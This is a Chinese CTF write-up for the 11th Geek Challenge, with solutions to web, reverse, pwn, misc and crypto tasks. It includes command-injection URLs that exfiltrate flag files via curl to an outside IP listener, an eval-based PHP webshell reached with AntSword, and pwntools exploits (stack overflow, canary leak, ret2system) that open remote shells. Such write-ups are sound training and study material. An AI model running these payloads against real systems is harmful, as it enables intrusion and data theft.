第11届极客大挑战writeup


第11届极客大挑战writeup

Web: 朋友的学妹 | EZwww | 刘壮的黑页 | Welcome | EZgit | 我是大黑客 | ezbypass | 知X堂的php教程
Re: No RE no gain | 我真不会写驱动! | WhatsApk | HelloAndroid | re00 | maze | Hello .NET
Misc: 一“页”障目 | 壮言壮语 | 秘技·反复横跳 | 来拼图
Pwn: 数学咋样? | runcode | liuzhuang-secret | baby_canary
Crypto: 二战情报员刘壮 | 铠甲与萨满 | 成都养猪二厂 | 规规矩矩的工作 | babyRSA | 韡髻猊岈 | 跳跃的指尖 | childRSA

Web

朋友的学妹

F12 查看页面源码,HTML 注释里藏了一段 base64 字符串,解码即得 flag。

EZwww

网站备份文件泄露:在 url 末尾加 www.zip 即可下载到源码。

<?php
// Challenge source recovered from www.zip. The "secret" is a hard-coded
// constant, so anyone holding the source can compute it offline:
// base64_decode('c3ljbDB2ZXI=') === 'sycl0ver'. Compare-to-constant checks
// are only as secret as the file they live in.
$key1 = $_POST['a'];
$key2 = base64_decode('c3ljbDB2ZXI=');
if($key1 === $key2) {
    //this is a true flag
    echo '<p>SYC{xxxxxxxxxxxxxxxxxx}</p>';
}
?>

POST传参a=sycl0ver

刘壮的黑页

<?php
// Challenge source. highlight_file(__FILE__) prints this very file to every
// visitor, so the expected credentials are public; the only twist is that
// username is read from the query string and passwd from the POST body.
include("flag.php");
highlight_file(__FILE__);
$username = $_GET['username'];
$passwd = $_POST['passwd'];
if ($username === 'admin' && $passwd === 'syclover') {
    echo $flag;
}
?>

get传username=admin,POST传passwd=syclover

Welcome

源码要求 REQUEST_METHOD 为 POST,否则直接 405;用 burpsuite 抓包把 GET 改成 POST 再发,即可看到 show_source 输出的源码。

<?php
// Challenge source. Intended bypass: in PHP 7, sha1() applied to an array
// returns NULL and only emits a warning, which error_reporting(0) hides.
// Two different arrays (roam1[]=1, roam2[]=2) therefore satisfy
// "values differ (!==) but hashes are identical (===)" as NULL === NULL.
// NOTE: PHP 8 throws a TypeError here instead, so the trick is version-bound.
error_reporting(0);
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    header("HTTP/1.1 405 Method Not Allowed");
    exit();
} else {
    if (!isset($_POST['roam1']) || !isset($_POST['roam2'])){
        show_source(__FILE__);
    } else if ($_POST['roam1'] !== $_POST['roam2'] && sha1($_POST['roam1']) === sha1($_POST['roam2'])){
        phpinfo(); // collect information from phpinfo!
    }
}

POST 传 roam1[]=1&roam2[]=2:两个数组不相等,满足 !==;而 PHP 7 里 sha1() 收到数组时返回 NULL(warning 被 error_reporting(0) 压掉),于是 sha1 结果 NULL === NULL 成立,拿到 phpinfo。按源码注释提示在 phpinfo 中收集信息后,url 后面加 f1444aagggg.php,用 burpsuite 抓包 send to repeater 再 send。

EZgit

用githacker

# Exposed .git directory: dump it and rebuild the repository with GitHacker.
# Inspect the full commit history, not just the checked-out tree.
python GitHacker.py http://47.100.46.169:3902/.git/

我是大黑客

同样是备份文件泄露:url 末尾加 liuzhuang.php.bak 下载到 liuzhuang.php 的源码,里面是一个 eval 后门。

<?php
// Backdoor leaked through the .bak copy: eval() on an attacker-controlled
// POST parameter is unauthenticated remote code execution. The parameter
// name ("liuzhuang") doubles as the webshell "password" that clients such as
// AntSword use to connect.
eval($_POST['liuzhuang']);
// Who is the great villain? That must be me, liuzhuang
// When your server sees 0xliuzhuang, you know it's time to buy a new machine
?>

用蚁剑(AntSword)连接该 eval 后门(连接密码即 POST 参数名 liuzhuang),在根目录找到了 flag。

ezbypass

GET传a[]=1&b=1 POST传c=123a

知X堂的php教程

dirname 参数被拼进了 shell 命令,用 `;` 截断原命令即可注入任意命令;这里把命令输出通过 curl -d 外带到自己监听的 175.24.81.163:14444(需事先在该端口监听),先定位 flag 文件再读取:

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `find / -name flag`

47.94.239.194:8082/listdir.php?dirname=JN;curl 175.24.81.163:14444 -d `cat /flagggggggggggggg_1s_here/flag`

Re

No RE no gain

我真不会写驱动!

WhatsApk

拖进JEB,在Resources文件夹的values文件夹的strings.xml文件里找到了flag

HelloAndroid

拖进JEB,在字符串界面搜索SYC即得flag

re00

导出byte_4060数组

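def decode(data, key=0x44):
    """Return the text obtained by XORing every value in *data* with *key*.

    The dumped ``byte_4060`` table is the flag with each byte XORed against a
    single constant; XOR is its own inverse, so applying the same key again
    recovers the plaintext. *data* is any iterable of ints; an empty input
    yields "".
    """
    return "".join(chr(value ^ key) for value in data)


# byte_4060, exported from the binary.
a = [23, 29, 7, 63, 55, 45, 41, 52, 40, 33, 27, 55, 45, 41, 52, 40, 33, 27,
     60, 43, 54, 54, 54, 27, 54, 45, 35, 44, 48, 123, 123, 57]

if __name__ == "__main__":
    print(decode(a))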

maze

Hello .NET

// WpfAppCS.MainWindow
// Decompiled check routine (Hello .NET). No need to run the binary: for each
// position i the accepted character is prime[i] - array[i], where prime[i] is
// the i-th prime found by the trial-division loop starting at 99 (99 = 9*11
// fails, so the list begins 101, 103, 107, 109, ...). Sanity check on the
// first four: 101-18='S', 103-14='Y', 107-40='C', 109+14='{'.
using System.Collections.Generic;
using System.Windows;
using System.Windows.Media;

private void Check(object sender, RoutedEventArgs e)
{
    string text = InputBox.Text;
    List<int> list = new List<int>();
    // One offset per flag character; the flag is exactly 22 characters.
    int[] array = new int[22] { 18, 14, 40, -14, -2, 30, 10, 42, 35, 48, 43, 49, 52, 72, 57, 68, 86, 145, 115, 128, 115, 86 };
    int num = 99;
    // Collect primes >= 99 until there is one per input character.
    // Trial division by odd i in [3, num): num is always odd here, so
    // skipping even divisors loses nothing.
    while (list.Count < text.Length)
    {
        bool flag = true;
        for (int i = 3; i < num; i += 2)
        {
            if (num % i == 0)
            {
                flag = false;
                break;
            }
        }
        if (flag)
        {
            list.Add(num);
        }
        num += 2;
    }
    bool flag2 = true;
    // Accept only if prime[i] - text[i] == array[i] for every position.
    for (num = 0; num < text.Length && num < array.Length; num++)
    {
        if (list[num] - text[num] != array[num])
        {
            flag2 = false;
            break;
        }
    }
    if (text.Length == array.Length && flag2)
    {
        Status.Foreground = new SolidColorBrush(Colors.Green);
        Status.Text = "Flag is corrent"; // sic: the typo is in the binary
    }
    else
    {
        Status.Foreground = new SolidColorBrush(Colors.Red);
        Status.Text = "Flag is incorrent";
    }
}

Misc

一“页”障目

宣传单两个字符串拼起来

壮言壮语

与佛论禅

秘技·反复横跳

foremost之后手动恢复二维码

来拼图

把有部分flag的图片拿出来拼在一起

Pwn

数学咋样?

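import re


def parse_nums(line):
    """Extract ``num_1`` and ``num_2`` from one test line sent by the service.

    *line* is what ``recvline`` returns after ``![i] `` has been consumed,
    as ``bytes`` or ``str``, and is expected to read
    ``num_1 = <int>, num_2 = <int>``. Returns ``(num_1, num_2)``.
    Raises ValueError if the line does not match, instead of the silent
    mis-slice the original ``find``-based parsing produced on unexpected
    spacing (and the bytes/str TypeError it raised under Python 3).
    """
    if isinstance(line, bytes):
        line = line.decode()
    match = re.search(r"num_1\s*=\s*(-?\d+).*?num_2\s*=\s*(-?\d+)", line)
    if match is None:
        raise ValueError(f"unexpected test line: {line!r}")
    return int(match.group(1)), int(match.group(2))


def main():
    """Answer the 20 addition tests, then dump whatever the service prints."""
    from pwn import context, remote

    context.log_level = "debug"
    p = remote("81.69.0.47", 1111)
    p.recvuntil(b"I have 20 tests")
    for i in range(20):
        p.recvuntil(b"![" + str(i).encode() + b"] ")
        num_1, num_2 = parse_nums(p.recvline())
        p.sendline(str(num_1 + num_2).encode())
    p.recvall()


if __name__ == "__main__":
    main()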

runcode

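#include <stdio.h>

/*
 * Code submitted to the "runcode" service: the sandbox compiles and runs
 * whatever we send, so just read the flag file and echo it.
 *
 * The original hard-coded three fgets/puts pairs and never checked fopen,
 * so a missing or unreadable file dereferenced a NULL FILE*. This version
 * reports that case and prints every line until EOF, however many there are.
 */
int main(void)
{
    char line[100];
    FILE *fp = fopen("/home/ctf/flag", "r");
    if (fp == NULL) {
        perror("fopen /home/ctf/flag");
        return 1;
    }
    /* fgets stops at '\n' or after sizeof line - 1 bytes, so an overlong
       line is simply emitted in chunks; puts appends its own newline. */
    while (fgets(line, sizeof line, fp) != NULL) {
        puts(line);
    }
    fclose(fp);
    return 0;
}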

liuzhuang-secret

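import struct


def build_payload(ret_addr, pad=0x78):
    """Return the stack-smash payload: *pad* filler bytes, then *ret_addr*.

    In the original solve the filler was 0x78 bytes and the target 0x40079B,
    i.e. presumably the saved return address sits 0x78 bytes above the start
    of the overflowed buffer with nothing (no canary) in between, and the
    binary is not PIE so the address is fixed — TODO confirm against the
    binary. The address is packed as a little-endian 64-bit value.
    Using bytes throughout avoids the str + bytes TypeError the original
    ``'a'*0x78 + p64(...)`` raises under Python 3.
    """
    return b"a" * pad + struct.pack("<Q", ret_addr)


def main():
    """Send the payload after the greeting and hand the shell to the user."""
    from pwn import context, remote

    context.log_level = "debug"
    p = remote("81.69.0.47", 1000)
    p.sendlineafter(b"My house is quite big, Do you want to play with me?",
                    build_payload(0x40079B))
    p.interactive()


if __name__ == "__main__":
    main()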

baby_canary

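import struct

# `pop rdi; ret` gadget from the original solve (non-PIE binary, fixed address).
POP_RDI_RET = 0x400873


def recover_canary(leak):
    """Rebuild the stack canary from the 8 bytes leaked after the filler.

    ``sendline`` appends ``\\n`` (0x0a) to the 0x68-byte filler; that single
    byte lands on the canary's lowest byte, which glibc keeps at 0x00 so that
    string functions stop there. With the zero gone, the program's output
    runs on into the canary, and subtracting 0x0a restores the real value.
    Raises ValueError if *leak* is not 8 bytes or its low byte is not the
    injected newline (the overflow did not land where expected).
    """
    if len(leak) != 8:
        raise ValueError(f"expected 8 leaked bytes, got {len(leak)}")
    value = struct.unpack("<Q", leak)[0]
    if (value & 0xFF) != 0x0A:
        raise ValueError("low byte is not the injected newline; wrong offset?")
    return value - 0x0A


def build_rop_chain(canary, pop_rdi_ret, binsh, system,
                    filler_len=0x68, fake_rbp=0xDEADBEEF):
    """Return the second-stage payload: filler, canary, saved rbp, ROP chain.

    Layout taken from the original exploit: *filler_len* bytes up to the
    canary, the recovered canary, a dummy saved rbp, then
    ``pop rdi; ret`` -> address of "/bin/sh" -> system(). Filler content is
    irrelevant; every qword is packed little-endian.
    """
    chain = [canary, fake_rbp, pop_rdi_ret, binsh, system]
    return b"A" * filler_len + b"".join(struct.pack("<Q", v) for v in chain)


def main():
    from pwn import ELF, context, cyclic, gdb, process, remote

    context.log_level = "debug"
    local = 0
    if local == 1:
        r = process("./baby_canary")
        gdb.attach(r, "b * 0x0400789")
    else:
        r = remote("81.69.0.47", 3333)
    elf = ELF("./baby_canary")
    system = elf.symbols["system"]
    binsh = next(elf.search(b"/bin/sh"))

    # Stage 1: overflow by exactly one byte (the newline) to leak the canary.
    r.sendline(cyclic(0x68))
    r.recvuntil(b"zaab")  # last 4 bytes of cyclic(0x68)
    canary = recover_canary(r.recv(8))
    print(hex(canary))
    # The next 6 non-zero bytes are presumably the saved rbp (a stack address).
    print(hex(struct.unpack("<Q", r.recv(6) + b"\x00\x00")[0]))

    # Stage 2: same overflow with the correct canary and a ret2system chain.
    # NOTE(review): no extra `ret` for 16-byte stack alignment before system();
    # it worked on this target, but a movaps crash is the usual symptom if not.
    r.sendline(build_rop_chain(canary, POP_RDI_RET, binsh, system))
    r.interactive()


if __name__ == "__main__":
    main()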

Crypto

二战情报员刘壮

摩斯密码

铠甲与萨满

凯撒密码

成都养猪二厂

猪圈密码+栅栏密码

规规矩矩的工作

希尔密码,把key的矩阵求逆矩阵再和三个数组成的向量相乘,得到三个数对应三个字母

babyRSA

# --- Challenge source (babyRSA) ---
# The oracle prints (c, q, n): one of the two primes is published, so the
# private exponent is one integer division away (p = n // q). Everything
# after the ''' ... ''' output block is the solve.
from Crypto.Util.number import *
from gmpy2 import *
from secret import p,flag
flag = bytes_to_long(bytes(flag,encoding='utf-8'))
q = getPrime(1024)
n = q*p
phi_ = (p-1)*(q-1)
e = 0x10001
d = invert(e,phi_)
c = (pow(flag, e, n))
print(long_to_bytes(pow(c, d, n)))
print((c,q,n))
'''out put (177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194, 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043, 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149) '''
# --- Solve ---
# Recover p from the leaked q, rebuild phi and d exactly as the challenge did,
# then decrypt. Values below are copied from the printed (c, q, n) tuple.
import gmpy2
import libnum
c = 177177672061025662936587345347268313127241651965256882323180749317515733256088163186914550682635245294414879862810654773207644687262596440870094409378849307188485755700138797651039936445998433830516207630858733090581643592843521203499818069822504434370840254518614785953412492701730326524258672860416318501278155194
e = 65537  # == 0x10001 in the challenge source
q = 166836705584681518148179737955842605213272207836752187845124149461151181903779374775281529346854786259719545699157508885500818994019618158708212777833768444327658647324555090459233657737950932895018766440119999513331707759691054888319029069397903003240927552065429412176600134636921146805408664505115889561043
n = 191051885543358947736760989661967468461742175898801910645529003886391047898839624568290216360845330501814019720570327197669064365268607597117598905046895097642708006373182989953758208523010345148200475257538336602695211819055893667974317905617522838840325499754862033348148407978527792816186094297381925119601464149
p = n // q  # q was leaked, so n factors trivially
d = gmpy2.invert(e, (p-1)*(q-1))
m = pow(c, d, n)
print(libnum.n2s(m))

韡髻猊岈

https://www.guballa.de/vigenere-solver

跳跃的指尖

键盘几个字母包住的字母

childRSA

低加密指数广播攻击(Hastad 广播攻击):同一明文用 e=3 在三个不同的 n 下加密,CRT 合并得到 m^3 mod n1·n2·n3,由于 m^3 小于三个模数之积,直接开立方即得 m。

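"""Hastad's broadcast attack (childRSA).

The same message was encrypted with e = 3 under three different moduli. With
at least e ciphertexts, CRT yields m**e mod (n1*n2*n3); since m < every n_i,
m**e is smaller than the product and the integer e-th root of the combined
value is m itself. Stdlib only: the gmpy2 ``iroot`` of the original is
replaced by an exact integer root below.
"""


def my_parse_number(number):
    """Decode the integer *number* as a big-endian byte string, as latin-1 text.

    Replaces the original hex-pair/chr loop, which silently mis-split an
    odd-length hex string (the first nibble became its own "byte").
    Returns "" for 0.
    """
    length = (number.bit_length() + 7) // 8
    return number.to_bytes(length, "big").decode("latin-1")


def extended_gcd(a, b):
    """Return ``(x, y, g)`` such that ``a*x + b*y == g == gcd(a, b)``."""
    x, y = 0, 1
    lastx, lasty = 1, 0
    while b:
        q, r = divmod(a, b)
        a, b = b, r
        x, lastx = lastx - q * x, x
        y, lasty = lasty - q * y, y
    return lastx, lasty, a


def chinese_remainder_theorem(items):
    """Solve ``x ≡ a_i (mod n_i)`` for pairwise coprime moduli.

    *items* is an iterable of ``(a_i, n_i)`` pairs. Returns ``(x, N)`` with
    ``0 <= x < N`` and ``N`` the product of all moduli.
    Raises ValueError when two moduli share a factor: the original code did
    ``N = N / n`` (a float under Python 3) and ``continue``d, returning
    garbage. For RSA a shared factor means the moduli can be factored with a
    plain gcd, so this attack is the wrong tool anyway.
    """
    items = list(items)
    N = 1
    for _, n in items:
        N *= n
    result = 0
    for a, n in items:
        m = N // n
        # n*r + m*s == d, so for d == 1, s is the inverse of m modulo n.
        _, s, d = extended_gcd(n, m)
        if d != 1:
            raise ValueError("moduli are not pairwise coprime; gcd them instead")
        result += a * s * m
    return result % N, N


def iroot(x, k):
    """Return ``(r, exact)`` with ``r = floor(x ** (1/k))`` for integer x >= 0.

    Pure-integer replacement for ``gmpy2.iroot``. *exact* is True iff
    ``r ** k == x``. Raises ValueError for negative *x* or *k* < 1.
    """
    if x < 0 or k < 1:
        raise ValueError("x must be >= 0 and k >= 1")
    if x < 2:
        return x, True
    # x < 2**bits <= (2**ceil(bits/k))**k, so that power of two is a strict
    # upper bound on the root; bisect for the largest r with r**k <= x.
    lo, hi = 0, 1 << -(-x.bit_length() // k)
    while lo < hi:
        mid = (lo + hi + 1) // 2
        if mid ** k <= x:
            lo = mid
        else:
            hi = mid - 1
    return lo, lo ** k == x


def broadcast_attack(sessions):
    """Recover the plaintext integer from ``e`` or more ``{"c","e","n"}`` sessions.

    All sessions must share the same public exponent. Raises ValueError if
    the exponents differ, fewer than ``e`` ciphertexts are supplied, or the
    CRT value is not a perfect e-th power (messages differed or were padded).
    """
    exps = {s["e"] for s in sessions}
    if len(exps) != 1:
        raise ValueError(f"sessions use different exponents: {sorted(exps)}")
    e = exps.pop()
    if len(sessions) < e:
        raise ValueError(f"need at least e={e} ciphertexts, got {len(sessions)}")
    x, _ = chinese_remainder_theorem((s["c"], s["n"]) for s in sessions)
    m, exact = iroot(x, e)
    if not exact:
        raise ValueError("CRT value is not a perfect e-th power; not a plain broadcast")
    return m


# The three intercepted (c, e, n) triples from the challenge.
sessions = [
    {"c": 0xff24bddc5a7b327535af92dba58c5d62a22d542e6ba1df6f91c98c7563d8e48e770fb623bfcc2f09ed49788293306ff709670b225da32ea134422d5e403b11c39ef6b144f96b2fe94b3aa136432ecea86a4069a4cb0b4d8570edb3fb5bb2cf0693184ef0c589887b012ebe6ea94e854a71a7eb768133d15e784e388976877db,
     "e": 3,
     "n": 0xe096219878f492bcdb2a2d03995521e7a65125733bae18e7d0005e35343fea3653698de60231d29b2d1b44a0b4ffd3183855b9042275f769e1702fa8843062df0938821db0258af40ab3cda8e54eb6ac826d545df91dfe76266cb01b1d6fad39e6ef13ce730c1c2395136b0bbdf22c6b0daba63701d71c6ae70d4e06935b9941},
    {"c": 0x895f8283e2200bab1bf938ce3b5e42147b53a5178e436ea0b64a2380ba99776d5ba8046ef722858b20d9650ee68c09e905030f1634e0b32397b7b12236a5a301e5923a294ef1bdf16458f4fc8677370ce2ce3d0fd957da7466e5b104191d454455917147f3187b758c1c468db1b35514391e5b36bd1ac39e91bbb24fdbc07872,
     "e": 3,
     "n": 0xa36b15a395edf3e99927f658e22d5f4aefd83434972c96cca5242a1aaa517ad83739451269723092dd9e73c00682dd3bbd74a985546def88196119b6d57b397283bc7b8b6029916df84284bec1725f6e5d3d29042af685c508a58ab6fb4e5bfeb326ae49330e3f4426abc1860ca4412feb976ee571075a47b854c9a6f5f0ebff},
    {"c": 0x3bead3d6760bff4de22562978d4722bb21ee4792ebdb32703b6df9ff5176e033e97ad8fc81467f4b3df7bd4e8bcae09462f3eca93a3da1cd9d7e8de3e464471fdd0b70112c1c738b0daa2a37a65331eaa8954b81b410f62a0280da32eb3e305782d5f774d814ca0adb13344687387cf72657dc21724bcf69da810d7635b99467,
     "e": 3,
     "n": 0x9d4732db2539d1166dc6865670be11951bf49295bc8c472f34682a0fb7f2b3ba96dcfa1945c2e4685dfeae5255abe2ab3b7fb2282971bb16ce02d14082f71755e8a65c956e114336914a409a9f1158fb362a92c4e169fa3c460ea26fb5c6693447b14f1c3156a2d9308dd993d7ea708a00ad149fb77109d8a5f77de1703ba249},
]

if __name__ == "__main__":
    print("Please wait, performing CRT")
    print(my_parse_number(broadcast_attack(sessions)))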